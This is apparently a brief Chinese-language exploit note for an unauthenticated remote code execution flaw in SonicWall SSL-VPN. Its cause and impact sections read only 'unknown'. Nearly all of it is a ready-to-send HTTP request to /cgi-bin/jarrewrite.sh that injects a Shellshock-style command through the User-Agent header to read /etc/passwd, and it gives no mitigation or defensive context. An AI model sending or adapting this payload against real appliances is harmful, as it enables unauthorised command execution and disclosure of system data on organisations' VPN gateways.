SonicWall SSL-VPN 未授权RCE漏洞复现
漏洞原因
未知
漏洞影响
未知
漏洞复现
Exp
GET /cgi-bin/jarrewrite.sh HTTP/1.1
Host:127.0.0.1
User-Agent: () { :; }; echo ; /bin/bash -c "cat /etc/passwd"
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: sslvpn_AOPortal_127.0.0.1=false; SessURL=https%3A%2F%2F127.0.0.1%2Fcgibin%
2Fwelcome
Connection: close
空空如也!